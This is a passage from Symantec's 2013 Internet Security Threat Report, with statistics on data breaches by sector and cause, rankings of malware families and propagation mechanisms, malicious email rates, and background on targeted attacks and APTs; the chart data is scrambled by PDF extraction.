Source: Based on data provided by Norton Cyber Crime Index<br />
Education<br />
16%<br />
Healthcare<br />
36%<br />
Government<br />
13%<br />
9% Accounting<br />
6% Computer Software<br />
6% Financial<br />
5% Information Technology<br />
4% Telecommunications<br />
3% Computer Hardware<br />
3% Community and Non-profit<br />
2<br />
35<br />
30<br />
25<br />
20<br />
15<br />
10<br />
5<br />
NUMBER OF INCIDENTS<br />
• Healthcare and education<br />
sectors ranked top for<br />
number of data breaches,<br />
making up just over<br />
50 percent of all data<br />
breaches. However, retail<br />
and the government sectors<br />
represent more than half of<br />
the identities exposed.<br />
• This indicates that the<br />
sectors responsible for the<br />
most data breaches don’t<br />
necessarily result in the<br />
largest caches of stolen<br />
identities.
p. 91<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
ThREAT ACTIVITy TRENDS<br />
Figure A.25. Data Breaches that Could Lead to Identity Theft (Top 10 Sectors by Number of Identities Exposed)<br />
Source: Based on data provided by Norton Cyber Crime Index<br />
Government<br />
24%<br />
Computer<br />
Hardware<br />
14%<br />
Retail<br />
27%<br />
10% Telecommunications<br />
9% Computer Software<br />
7% Accounting<br />
3% Financial<br />
2% Healthcare<br />
2% Information Technology<br />
2% Social Networking<br />
Figure A.26. Average Number of Identities Exposed Per Data Breach by Notable Sector<br />
Source: Based on data provided by Norton Cyber Crime Index<br />
Retail<br />
Telecom<br />
Accounting<br />
Government<br />
Social Networking<br />
Financial<br />
Computer Software<br />
Information Tech<br />
Hospitality<br />
Computer Hardware<br />
.1<br />
.6<br />
.5<br />
.4<br />
.3<br />
1.4<br />
1.2<br />
1.7<br />
3.1<br />
0 2 4 6 8 10 12<br />
MILLIONS<br />
12<br />
The largest<br />
number of identities<br />
exposed per breach<br />
in 2012 occurred<br />
in the retail sector,<br />
where one breach<br />
topped 10 million<br />
identities.
p. 92<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
ThREAT ACTIVITy TRENDS<br />
Data and Commentary for Data Breaches that Could Lead to Identity Theft by Cause<br />
Figure A.27. Data Breaches that Could Lead to Identity Theft by Number of Breaches<br />
Source: Based on data provided by Norton Cyber Crime Index<br />
Accidentally<br />
Made Public<br />
23%<br />
Hackers<br />
40%<br />
Theft or Loss<br />
of Computer<br />
or Drive<br />
23%<br />
8% Insider Theft<br />
6% Unknown<br />
0.6% Fraud<br />
Figure A.27. Data Breaches that Could Lead to Identity Theft by Number of Identitites Exposed<br />
Source: Based on data provided by Norton Cyber Crime Index<br />
Hackers<br />
79%<br />
Theft or Loss<br />
of Computer<br />
or Drive<br />
23%<br />
3% Accidentally Made Public<br />
1% Unknown<br />
0.3% Insider Theft<br />
Hackers were the top cause<br />
for data breaches: The most<br />
frequent cause of data breaches<br />
(across all sectors) that could<br />
facilitate identity theft in 2012<br />
was hacking attempts, which<br />
accounted for 40 percent of<br />
breaches that could lead to<br />
identities being exposed and<br />
this equated to approximately<br />
18.5 million identities exposed<br />
in total.
p. 93<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
ThREAT ACTIVITy TRENDS<br />
Figure A.28. Average Number of Identities Exposed Per Data Breach by Cause<br />
Source: Based on data provided by Norton Cyber Crime Index<br />
Theft or Loss of<br />
Computer or Drive<br />
Hackers 1,192,092<br />
Unknown<br />
Accidentally<br />
Made Public<br />
Insider Theft<br />
Fraud<br />
138,295<br />
77,028<br />
21,801<br />
p. 94<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
ThREAT ACTIVITy TRENDS<br />
Threat Activity Trends Endnotes<br />
01 Internet population and penetration rates in 2012 courtesy of Internet Word Stats http://www.<strong>internet</strong>worldstats.com.<br />
02 See http://www.symantec.com/<strong>security</strong>_response/writeup.jsp?docid=2012-012709-4046-99.<br />
03 See http://www.symantec.com/connect/blogs/update-androidcounterclank.<br />
04 For more details about Norton Safe Web, please visit http://safeweb.norton.com/.<br />
05 For more details about Symantec Rulespace, please visit http://www.symantec.com/theme.jsp?themeid=rulespace.<br />
06 Command and control.<br />
07 International Mobile Equipment Identity.<br />
08 International Mobile Subscriber Identity.<br />
09 See http://developer.android.com/about/dashboards/index.html.<br />
10 See http://www.nortoncybercrimeindex.com/.<br />
11 See http://www.idanalytics.com/.<br />
12 For example, the Fair and Accurate Credit Transactions Act of 2003 (FACTA) of California. For more on this act, please see<br />
http://www.privacyrights.org/fs/fs6a-facta.htm. Another example is the Health Insurance Portability and Accountability Act of<br />
1996. For more information see: http://www.cms.hhs.gov/HIP AAGenInfo/.
p. 95<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
APPENDIX :: B<br />
MALICIOUS CODE<br />
TRENDS
p. 96<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
MALICIOUS CODE TRENDS<br />
Malicious Code Trends<br />
Symantec collects malicious code information from our large global customer base through<br />
a series of opt-in anonymous telemetry programs, including Norton Community Watch,<br />
Symantec Digital Immune System, and Symantec Scan and Deliver technologies. Well over<br />
133 million clients, servers, and gateway systems actively contribute to these programs. New<br />
malicious code samples, as well as detection incidents from known malicious code types, are<br />
reported back to Symantec. These resources give Symantec’s analysts unparalleled sources<br />
of data with which to identify, analyze, and provide informed commentary on emerging<br />
trends in malicious code activity in the threat landscape.<br />
Reported incidents are considered potential infections if an infection could have occurred in<br />
the absence of <strong>security</strong> software to detect and eliminate the threat.<br />
In this section, the following malicious code trends are analyzed for 2012:<br />
• Top Malicious Code Families<br />
• Analysis of Malicious Code Activity by Geography, Industry Sector, and Company Size<br />
• Propagation Mechanisms<br />
• Industrial Espionage: Targeted Attacks and advanced Persistent Threats (APTs)
p. 97<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
MALICIOUS CODE TRENDS<br />
Top Malicious Code Families<br />
Background<br />
Malicious code threats are classified into four main types—<br />
backdoors, viruses, worms, and Trojans:<br />
• Backdoors allow an attacker to remotely access<br />
compromised computers.<br />
• Viruses propagate by infecting existing files on affected<br />
computers with malicious code.<br />
• Worms are malicious code threats that can replicate on<br />
infected computers or in a manner that facilitates them<br />
being copied to another computer (such as via USB storage<br />
devices).<br />
• Trojans are malicious code that users unwittingly install<br />
onto their computers, most commonly through either<br />
opening email attachments or downloading from the<br />
Internet. Trojans are often downloaded and installed by<br />
other malicious code as well. Trojan horse programs differ<br />
from worms and viruses in that they do not propagate<br />
themselves.<br />
Many malicious code threats have multiple features; for<br />
example, a backdoor will always be categorized in conjunction<br />
with another malicious code feature. Typically, backdoors are<br />
also Trojans; however, many worms and viruses also incorporate<br />
backdoor functionality. In addition, many malicious code<br />
samples can be classified as both worm and virus due to the way<br />
they propagate. One reason for this is that threat developers<br />
try to enable malicious code with multiple propagation vectors<br />
in order to increase their odds of successfully compromising<br />
computers in attacks.<br />
Symantec analyzes new and existing malicious code families<br />
to determine which threat types and attack vectors are being<br />
employed in the most prevalent threats. This information also<br />
allows system administrators and users to gain familiarity with<br />
threats that attackers may favor in their exploits. Insight into<br />
emerging threat development trends can help them to bolster<br />
<strong>security</strong> measures and mitigate future attacks.<br />
The endpoint is often the last line of defense and analysis;<br />
however, the endpoint can often be the first line of defense<br />
against attacks that spread using USB storage devices and<br />
insecure network connections. The threats found here can shed<br />
light on the wider nature of threats confronting businesses,<br />
especially from blended attacks and threats facing mobile<br />
workers. Attacks reaching the endpoint are likely to have already<br />
circumvented other layers of protection that may already be<br />
deployed, such as gateway or cloud-based filtering.<br />
Methodology<br />
A malicious code family is initially compromised up of a distinct<br />
malicious code sample. As variants to the sample are released,<br />
the family can grow to include multiple variants. Symantec<br />
determines the most prevalent malicious code families by<br />
collating and analyzing anonymous telemetry data gathered for<br />
the reporting period.<br />
Malicious code family rankings tend to be weighted towards fileinfecting<br />
threats due to their nature. These threats tend to infect<br />
large numbers of executable files in the hopes that they will<br />
spread or be shared out to other computers. This propagation<br />
approach increases their overall presence when looking at<br />
the total number of malicious files in the threat landscape. In<br />
contrast, a threat like a Trojan, which doesn’t use automatic<br />
propagation techniques, will not rank as highly. As a result,<br />
malicious code families that include file-infecting functionality<br />
are picked up by antivirus sensors more frequently and will rank<br />
higher in overall numbers.<br />
Overall, the top ten list of malicious code families accounted for<br />
41.2 percent of all potential infections blocked in 2012.
p. 98<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
MALICIOUS CODE TRENDS<br />
Figure B.1. Overall Top Malicious Code Families, 2012<br />
Source: Symantec<br />
Rank Name Type<br />
1 W32.ramnit Virus/Worm<br />
2 W32.sality Virus/Worm<br />
3 W32.Downadup Worm/Backdoor<br />
Propagation<br />
Mechanisms<br />
executable files and<br />
removable drives<br />
executable files and<br />
removable drives<br />
P2P/ciFs/remote<br />
vulnerability<br />
4 W32.Virut Virus/Backdoor executables<br />
5 W32.sillyFDc Worm removable drives<br />
6 W32.Almanahe Virus/Worm<br />
7 W32.Mabezat Virus/Worm<br />
ciFs/mapped drives/<br />
removable drives/<br />
executables<br />
sMtP/ciFs/removable<br />
drives<br />
8 W32.chir Worm sMtP engine<br />
9 W32.changeup Worm<br />
10 W32.Xpaj Virus<br />
removable and mapped<br />
drives/file sharing<br />
programs/Microsoft<br />
vulnerability<br />
executables/removable,<br />
mapped, and network<br />
drives<br />
Impacts/Features<br />
infects various file types, including executable files, and<br />
copies itself to removable drives. it then relies on AutoPlay<br />
functionality to execute when the removable drive is accessed<br />
on other computers.<br />
uses polymorphism to evade detection. Once running on<br />
an infected computer, it infects executable files on local,<br />
removable, and shared network drives. it then connects to a<br />
P2P botnet, downloads and installs additional threats. the<br />
virus also disables installed <strong>security</strong> software.<br />
the worm disables <strong>security</strong> applications and Windows<br />
update functionality and allows remote access to the infected<br />
computer. exploits vulnerabilities to copy itself to shared<br />
network drives. it also connects to a P2P botnet and may<br />
download and install additional threats.<br />
infects various file types, including executable files, and<br />
copies itself to local, removable, and shared network drives. it<br />
also establishes a backdoor that may be used to download and<br />
install additional threats.<br />
Downloads additional threats and copies itself to removable<br />
drives. it then relies on AutoPlay functionality to execute when<br />
the removable drive is accessed on other computers.<br />
Disables <strong>security</strong> software by ending related processes. it also<br />
infects executable files and copies itself to local, removable,<br />
and shared network drives. the worm may also download and<br />
install additional threats.<br />
copies itself to local, removable, and shared network drives.<br />
infects executables and encrypts various file types. it may<br />
also use the infected computer to send spam email containing<br />
infected attachments.<br />
searches across the network and accesses files on other<br />
computers. However, due to a bug, these files are not modified<br />
in any way.<br />
the primary function of this threat is to download more<br />
malware on to the compromised computer. it is likely<br />
that the authors of the threat are associated with affiliate<br />
schemes that are attempting to generate money through the<br />
distribution of malware.<br />
infects .dll, .exe, .scr, and .sys files on the compromised<br />
computer.<br />
%<br />
Overall<br />
15.4%<br />
7.6%<br />
5.4%<br />
3.7%<br />
3.1%<br />
2.1%<br />
1.5%<br />
1.2%<br />
0.6%<br />
0.6%
p. 99<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
MALICIOUS CODE TRENDS<br />
Figure B.2. Relative Volume of Reports of Top 10 Malicious Code Families in 2012 by Percentage<br />
Source: Symantec<br />
Others<br />
59%<br />
W32.Ramnit<br />
15%<br />
8% W32.Sality<br />
5% W32.Downadup<br />
4% W32.Virut<br />
3% W32.SillyFDC<br />
2% W32.Almanahe<br />
2% W32.Mabezat<br />
1% W32.Chir<br />
1% W32.Changeup<br />
1% W32.Xpaj<br />
Figure B.3. Relative Proportion of Top 10 Malicious Code Blocked in Email Traffic by Symantec.cloud in 2012 by Percentage and Ratio<br />
Source: Symantec<br />
Rank Malware % of Email Malware Equivalent Ratio in Email<br />
1 exploit/spoofBBB 1.58% 1 in 63.4<br />
2 trojan.Bredolab 1.46% 1 in 68.7<br />
3 eML/Worm.XX.dam 0.85% 1 in 117.5<br />
4 exploit/suspLink 0.78% 1 in 127.9<br />
5 exploit/LinkAliasPostcard-4733 0.66% 1 in 151.0<br />
6 W32/netsky.c-mm 0.58% 1 in 171.1<br />
7 trojan.sasfis.dam 0.53% 1 in 187.5<br />
8 exploit/Link-FakeAcHupdate 0.52% 1 in 190.7<br />
9 exploit/FakeAttach 0.51% 1 in 194.7<br />
10 W32/netsky.P-mm 0.51% 1 in 196.7
p. 100<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
MALICIOUS CODE TRENDS<br />
Figure B.4. Trend of Malicious Code Blocked in Email Traffic by Symantec.cloud – 2011 vs 2012<br />
Source: Symantec.cloud<br />
1 in 50<br />
1 in 100<br />
1 in 150<br />
1 in 200<br />
1 in 250<br />
1 in 300<br />
1 in 350<br />
1 in 400<br />
JAN<br />
FEB<br />
MAR<br />
APR<br />
MAY<br />
JUN<br />
JUL<br />
AUG<br />
SEP<br />
OCT<br />
NOV<br />
DEC<br />
2011 2012<br />
Figure B.5. Relative Proportion of Top 10 Malicious Code Blocked in Web Traffic by Symantec.cloud In 2012 by Percentage and Ratio<br />
Source: Symantec.cloud<br />
Rank Name % of Email Malware Equivalent Ratio in Email<br />
1 trojan.Js.iframe.AOX 10.6% 1 in 9.5<br />
2 trojan.iframe.Xi 7.1% 1 in 14.2<br />
3 infostealer.Gampass 5.2% 1 in 19.3<br />
4 Dropped:rootkit.49324 4.6% 1 in 21.6<br />
5 exploit.Link-Javascript-4cda 4.4% 1 in 22.9<br />
6 exploit.Link-Javascript-3f9f 4.0% 1 in 25.1<br />
7 suspicious.emit 3.3% 1 in 30.1<br />
8 trojan.script.12023 3.2% 1 in 31.5<br />
9<br />
Dropped:trojan.PWs.<br />
OnlineGames.KDVn<br />
3.1% 1 in 32.0<br />
10 W32.Almanahe.B 2.2% 1 in 46.3
p. 101<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
MALICIOUS CODE TRENDS<br />
Commentary<br />
• Ramnit again beats Sality to become the most prevalent<br />
malicious code family in 2012. Ranked first again in 2011,<br />
the top malicious code family by volume of potential<br />
infections in 2012 was Ramnit.<br />
Samples of the Ramnit family of malware were responsible<br />
for significantly more potential infections (15.4 percent)<br />
than the second ranked malicious code family in 2012,<br />
Sality (7.6 percent).<br />
First discovered in 2010, W32.Ramnit has been a prominent<br />
feature of the threat landscape since then, often switching<br />
places with Sality throughout the year as the two families<br />
jockey for first position.<br />
Ramnit spreads by encrypting and then appending itself<br />
to DLL, EXE, and HTML files. It can also spread by copying<br />
itself to the recycle bin on removable drives and creating<br />
an AUTORUN.INF file so that the malware is potentially<br />
automatically executed on other computers. This can occur<br />
when an infected USB device is attached to a computer. The<br />
reliable simplicity of spreading via USB devices and other<br />
media makes malicious code families such as Ramnit, and<br />
Sality (as well as SillyFDC and others) effective vehicles for<br />
installing additional malicious code on computers.<br />
• The Sality family of malware, ranked second, remains<br />
attractive to attackers because it uses polymorphic<br />
code that can hamper detection. Sality is also capable<br />
of disabling <strong>security</strong> services on affected computers.<br />
These two factors may lead to a higher rate of successful<br />
installations for attackers. Sality propagates by infecting<br />
executable files and copying itself to removable drives such<br />
as USB devices. Similar to Ramnit, Sality also relies on<br />
AUTORUN.INF functionality to potentially execute when<br />
those drives are accessed.<br />
• Downadup gains a bit of momentum: Downadup (a.k.a.<br />
Conficker) was ranked in third position in 2012, compared<br />
with 2011 when it was ranked fourth-most malicious code<br />
family by volume of potential infections in 2011. Downadup<br />
propagates by exploiting vulnerabilities in order to copy<br />
itself to network shares. Downadup was estimated to have<br />
infected slightly more than 2 million PCs worldwide at the<br />
end of 2012, 1 compared with approximately 3 million at the<br />
end of 2011.<br />
• Overall in 2012, 1 in 281.8 emails was identified as<br />
malicious, compared with 1 in 238.8 in 2011; 22.5 percent<br />
of email-borne malware comprised hyperlinks that<br />
referenced malicious code, in contrast with malware that<br />
was contained in an attachment to the email. This figure<br />
was 39.1 percent in 2010, an indication that cybercriminals<br />
are attempting to circumvent <strong>security</strong> countermeasures<br />
by changing the vector of attacks from purely email to the<br />
Web.<br />
• In 2012, 12.6 percent of malicious code detected was<br />
identified and blocked using generic detection technology.<br />
Many new viruses and Trojans are based on earlier versions,<br />
where code has been copied or altered to create a new strain,<br />
or variant. Often these variants are created using toolkits<br />
and hundreds of thousands of variants can be created from<br />
the same piece of malware. This has become a popular<br />
tactic to evade signature-based detection, as each variant<br />
would traditionally need its own signature to be correctly<br />
identified and blocked. By deploying techniques, such as<br />
heuristic analysis and generic detection, it’s possible to<br />
correctly identify and block several variants of the same<br />
malware families, as well as identify new forms of malicious<br />
code that seek to exploit certain vulnerabilities that can be<br />
identified generically.<br />
• Exploit/SpoofBBB was the most frequently blocked<br />
malware in email traffic by Symantec.cloud in 2012, with<br />
Trojan.Bredolab taking the second position.<br />
• Trojan.JS.Iframe.AOX was the most frequently blocked<br />
malicious activity in Web traffic filtered by Symantec.cloud<br />
in 2012. Detection for a malicious IFRAME is triggered in<br />
HTML files that contain hidden IFRAME elements with<br />
JavaScript code that attempts to perform malicious actions<br />
on the computer; for example, when visiting a malicious<br />
Web page, the code attempts to quietly direct the user to a<br />
malicious URL while the current page is loading.<br />
• Stuxnet in 2012: Despite being developed for a very specific<br />
type of target, the number of reports of potential Stuxnet<br />
infections observed by Symantec in 2012 placed the<br />
worm at a rank beyond 30 among malicious code families,<br />
compared with 18 in 2011. The Stuxnet worm generated<br />
a significant amount of attention in 2010 because it was<br />
the first malicious code designed specifically to attack<br />
Programmable Logic Controller (PLC) industry control<br />
systems. 2 Notably, Stuxnet was the first malicious code<br />
family that may directly affect the physical world and<br />
proves the feasibility for malicious code to cause potentially<br />
dramatic physical destruction.
p. 102<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
MALICIOUS CODE TRENDS<br />
Analysis of Malicious Code Activity by Geography, Industry Sector, and Company Size<br />
Background<br />
Malicious code activity trends can also reveal patterns that<br />
may be associated with particular geographical locations, or<br />
hotspots. This may be a consequence of social and political<br />
changes in the region, such as increased broadband penetration<br />
and increased competition in the marketplace that can drive<br />
down prices, increasing adoption rates. Of course, there may<br />
also be other factors at work, based on the local economic<br />
conditions that may present different risk factors. Similarly, the<br />
industry sector may also have an influence on an organization’s<br />
risk factor, where certain industries may be exposed to different<br />
levels of threat, by the nature of their business.<br />
Moreover, the size of an organization can also play a part in<br />
determining their exposure to risk. Small to medium-sized<br />
businesses (SMBs) may find themselves the target of a malicious<br />
attack by virtue of the relationships they have with other<br />
organizations; for example, a company may be subjected to<br />
an attack because they are a supplier to a larger organization<br />
and attackers may seek to take advantage of this relationship<br />
Data<br />
in forming the social engineering behind subsequent attacks<br />
to the main target, using the SMB as a springboard for these<br />
later attacks. SMBs are perceived to be a softer target because<br />
they are less likely to have the same levels of in-depth<br />
defenses as a larger organization, which is more likely to<br />
have greater budgetary expenditure applied to their <strong>security</strong><br />
countermeasures.<br />
Methodology<br />
Figure B.6. Proportion of Email Traffic Identified as Malicious by Industry Sector, 2012<br />
Source: Symantec.cloud<br />
Gov/Public Sector<br />
Education<br />
Finance<br />
Marketing/Media<br />
Accom/Catering<br />
Non-Profit<br />
Estate Agents<br />
Chem/Pharm<br />
Recreation<br />
Prof Services<br />
1 in<br />
400<br />
1 in<br />
350<br />
1 in<br />
300<br />
1 in<br />
250<br />
1 in<br />
200<br />
1 in<br />
150<br />
Analysis of malicious code activity based on geography,<br />
industry, and size are based on the telemetry analysis from<br />
Symantec.cloud clients for of threats detected and blocked<br />
against those organizations in email traffic during 2012.<br />
This analysis looks at the profile of organizations being<br />
subjected to malicious attacks, in contrast to the source of the<br />
attack.<br />
1 in<br />
100<br />
1 in<br />
50<br />
2011 2012
p. 103<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
MALICIOUS CODE TRENDS<br />
Figure B.7. Proportion of Email Traffic Identified as Malicious by Organization Size, 2012<br />
Source: Symantec.cloud<br />
1-250<br />
251-500<br />
501-1000<br />
1001-1500<br />
1501-2500<br />
2501+<br />
1 in<br />
450<br />
1 in<br />
405<br />
1 in<br />
360<br />
1 in<br />
315<br />
1 in<br />
270<br />
1 in<br />
225<br />
1 in<br />
180<br />
1 in<br />
135<br />
Figure B.8. Proportion of Email Traffic Identified as Malicious by Geographic Location, 2012<br />
Source: Symantec.cloud<br />
Netherlands<br />
Luxenbourg<br />
United Kingdom<br />
South Africa<br />
Germany<br />
Australia<br />
Bahrain<br />
Austria<br />
Hungary<br />
Canada<br />
1 in<br />
400<br />
1 in<br />
350<br />
1 in<br />
300<br />
1 in<br />
250<br />
1 in<br />
200<br />
1 in<br />
150<br />
1 in<br />
90<br />
1 in<br />
45<br />
2011 2012<br />
1 in<br />
100<br />
1 in<br />
50<br />
2011 2012
p. 104<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
MALICIOUS CODE TRENDS<br />
Commentary<br />
• The rate of malicious attacks carried by email has increased<br />
for four of the top 10 geographies being targeted and<br />
decreased for the other six; malicious email threats fell in<br />
2011 for organizations in Luxembourg, United Kingdom,<br />
South Africa, Bahrain, Hungary, and Canada.<br />
• Businesses in the Netherlands were subjected to the highest<br />
average ratio of malicious email-borne email in 2012, with<br />
1 in 108.0 emails blocked as malicious, compared with 1 in<br />
266.8 in 2011.<br />
• Globally, organizations in the Government and Public sector<br />
were subjected to the highest level of malicious attacks in<br />
email traffic, with 1 in 72.2 emails blocked as malicious in<br />
2012, compared with 1 in 41.1 for 2011.<br />
• Malicious email threats have increased for all sizes of<br />
organizations, with 1 in 252.1 emails being blocked as<br />
malicious for large enterprises with more than 2,500<br />
employees in 2012, compared with 1 in 205.1 in 2011.<br />
• 1 in 299.2 emails were blocked as malicious for SMBs<br />
with between 1-250 employees in 2012, compared with<br />
1 in 267.9 in 2011
p. 105<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
MALICIOUS CODE TRENDS<br />
Propagation Mechanisms<br />
Background<br />
Worms and viruses use various means to spread from one<br />
computer to another. These means are collectively referred to as<br />
propagation mechanisms. Propagation mechanisms can include<br />
a number of different vectors, such as instant messaging (IM),<br />
Simple Mail Transfer Protocol (SMTP), Common Internet File<br />
System (CIFS), peer-to-peer file transfers (P2P), and remotely<br />
exploitable vulnerabilities. 3 Some malicious code may even use<br />
other malicious code as a propagation vector by locating<br />
a computer that has been compromised through a backdoor<br />
server and using it to upload and install itself.<br />
Methodology<br />
This metric assesses the prominence of propagation<br />
mechanisms used by malicious code. To determine this,<br />
Symantec analyzes the malicious code samples that propagate<br />
and ranks associated propagation mechanisms according to<br />
the related volumes of potential infections observed during the<br />
reporting period. 4
p. 106<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
MALICIOUS CODE TRENDS<br />
Data<br />
Figure B.9. Propagation Mechanisms<br />
Source: Symantec<br />
Rank Propagation Mechanisms<br />
1<br />
2<br />
3<br />
4<br />
5<br />
6<br />
7<br />
8<br />
9<br />
10<br />
EXECUTABLE FILE ShARING. the malicious code creates copies of itself or infects<br />
executable files. the files are distributed to other users, often by copying them to<br />
removable drives such as usB thumb drives and setting up an autorun routine.<br />
FILE TRANSFER, CIFS CIFS. this is a file sharing protocol that allows files and other<br />
resources on a computer to be shared with other computers across the <strong>internet</strong>. One<br />
or more directories on a computer can be shared to allow other computers to access<br />
the files within. Malicious code creates copies of itself on shared directories to affect<br />
other users who have access to the share.<br />
REMOTELy EXPLOITABLE VULNERABILITy. the malicious code exploits a<br />
vulnerability that allows it to copy itself to or infect another computer.<br />
FILE TRANSFER, EMAIL ATTAChMENT. the malicious code sends spam email that<br />
contains a copy of the malicious code. should a recipient of the spam open the<br />
attachment, the malicious code will run and their computer may be compromised.<br />
FILE TRANSFER, P2P. the malicious code copies itself to folders on an infected<br />
computer that are associated with P2P file sharing applications. When the<br />
application runs, the malicious file will be shared with other users on the same P2P<br />
network.<br />
FILE TRANSFER, NON-EXECUTABLE FILE ShARING. the malicious code infects nonexecutable<br />
files.<br />
FILE TRANSFER, hTTP, EMBEDDED URL, INSTANT MESSENGER. the malicious code<br />
sends or modifies instant messages with an embedded uri that, when clicked by the<br />
recipient, will launch an attack and install a copy of the malicious code.<br />
SQL. the malicious code accesses sQL servers, by exploiting a latent sQL<br />
vulnerability or by trying default or guessable administrator passwords, and copies<br />
itself to the server.<br />
FILE TRANSFER, INSTANT MESSENGER. the malicious code sends or modifies<br />
instant messages that contain a copy of the malicious code. should a recipient of the<br />
spam open the attachment, the malicious code will run and their computer may be<br />
compromised.<br />
FILE TRANSFER, hTTP, EMBEDDED URI, EMAIL MESSAGE BODy. the malicious code<br />
sends spam email containing a malicious uri that, when clicked by the recipient, will<br />
launch an attack and install a copy of the malicious code.<br />
2012<br />
Percentage<br />
Change<br />
71% -5% 76%<br />
33% -10% 43%<br />
26% -2% 28%<br />
8% -6% 14%<br />
4% -3% 7%<br />
3% +1% 2%<br />
3% +2% 1%<br />
1% -0% 1%<br />
1% -4% 5%<br />
p. 107<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
MALICIOUS CODE TRENDS<br />
Commentary<br />
As malicious code continues to become more sophisticated,<br />
many threats employ multiple mechanisms.<br />
• Executable file sharing activity decreases: In 2012, 71<br />
percent of malicious code propagated as executables,<br />
a decrease from 76 percent in 2011. This propagation<br />
mechanism is typically employed by viruses and some<br />
worms to infect files on removable media. For example,<br />
variants of Ramnit and Sality use this mechanism, and both<br />
families of malware were significant contributing factors in<br />
this metric, as they were ranked as the two most common<br />
potential infections blocked in 2012.<br />
• Remotely exploitable vulnerabilities decrease: The<br />
percentage of malicious code that propagated through<br />
remotely exploitable vulnerabilities in 2012 at 26 percent<br />
was 2 percentage points lower than in 2011. Examples of<br />
attacks employing this mechanism also include Downadup,<br />
which gains a bit of momentum and is still a major<br />
contributing factor to the threat landscape, ranked third<br />
position in 2012.<br />
• File transfer using CIFS is in decline: The percentage of<br />
malicious code that propagated through CIFS file transfer<br />
fell by 10 percentage points between 2011 and 2012, a<br />
deeper decline than the one seen in 2011. Fewer attacks<br />
exploited CIFS as an infection vector in 2012.<br />
• File transfer via email attachments continues to decline: It<br />
is worth noting the continued decline in the percentage of<br />
malicious code that propagated through email attachments<br />
for the fifth year running. Between 2011 and 2012, the<br />
proportion of malware using this mechanism fell by six<br />
percentage points.<br />
• While this propagation mechanism is still effective, it was<br />
expected that this downward trend would contine; however,<br />
the shift towards using malicious URLS that was observed<br />
in 2011 did not continue as expected into 2012.
p. 108<br />
Symantec Corporation<br />
Internet Security Threat Report <strong>2013</strong> :: Volume 18<br />
MALICIOUS CODE TRENDS<br />
Industrial Espionage: Targeted Attacks and Advanced Persistent Threats (APTs)<br />
Background<br />
With targeted attacks and advanced persistent threats being<br />
very much in the news in 2012, in this section we review<br />
targeted attacks and look more closely at what has been<br />
described as “advanced persistent threats” or APTs. Terms such<br />
as APT have been overused and sometimes misused, but APTs<br />
are a real threat to some companies and industries.<br />
As noted earlier in this section, overall in 2012, 1 in 281.8<br />
emails were identified as malicious, but approximately 0.2<br />
percent of those were highly targeted. This means that highly<br />
targeted attacks, which may be the precursor to an APT, account<br />
for approximately one in every two million emails, still a rare<br />
incident rate. However, targeted malware in general has grown<br />
in volume and complexity in recent years, but as it is designed<br />
to steal company secrets, it can be very difficult for recipients<br />
to recognize, especially when the attacker employs compelling<br />
social engineering techniques, as we highlight in this report.<br />
Targeted attacks have been around for a number of years now,<br />
and when they first surfaced back in 2005, Symantec.cloud<br />
identified and blocked approximately one attack each week.<br />
Over the course of the following year, this number rose to one<br />
or two per day, and over the following years it rose still further.<br />
The global average number of attacks per day in 2012 was<br />
116, compared with 82 in 2011 and 77 in 2010. We witnessed<br />
one large attack in April (see Figure B.10). Events like this are<br />
extremely rare, and this particular attack resulted in a large<br />
jump for that month. Without adjusting for this, the global<br />
average would be nearer to 143 per day with this company<br />
included.<br />
A highly targeted attack is typically the precursor to an APT,<br />
and the typical profile of a highly targeted attack will commonly<br />
exploit a maliciously crafted document or executable, which is<br />
emailed to a specific individual, or small group of individuals.<br />
These emails will be dressed up with a social engineering<br />
element to make it more interesting and relevant.<br />
The term “APT” has evolved to describe a unique category<br />
of targeted attacks that are specifically designed to target a<br />
particular individual or organization. APTs are designed to stay<br />
below the radar, and remain undetected for as long as possible,<br />
a characteristic that makes them especially effective, moving<br />
quietly and slowly in order to evade detection. Unlike the fastmoney<br />
schemes typical of more common targeted attacks, APTs<br />
may have international espionage and/or sabotage objectives.<br />
The objective of an APT may include military, political or<br />
economic intelligence gathering, confidential or trade secret<br />
threat, disruption of operations, or even the destruction of<br />
equipment.<br />
Another characteristic of an APT is that it will be part of a<br />
longer-term campaign and not follow the opportunistic “smashand-grab”<br />
approach typical of most malware in circulation today.<br />
Its purpose will be to remain undetected for as long as possible,<br />
perhaps using a variety of attacks over that period. If one attack<br />
fails, then a different approach—one more likely to succeed—will<br />
be taken in the weeks to come. If successful, an attacker can<br />
use the compromised systems as a beachhead for subsequent<br />
attacks.<br />
All of which illustrate how these attacks can be both advanced<br />
and persistent threats. They are advanced because of the<br />
methods employed to avoid detection, such as the use of<br />
zero-day exploits, and the means used to communicate with<br />
the command and control network; command and control<br />
instructions often involve encrypted traffic, typically sent in<br />
small bursts and disguised as normal network traffic. The key to<br />
ensuring that any stolen information can be exfiltrated without<br />
detection requires the attacker to avoid using easily detectable<br />
encryption, and to use common protocol channels that would<br />
not look out of place, but while making sure the data remains<br />
hidden.<br />
Furthermore, they can be described as persistent because<br />
the aim is to maintain a foothold within the compromised<br />
company’s infrastructure, and in order to achieve this, the<br />
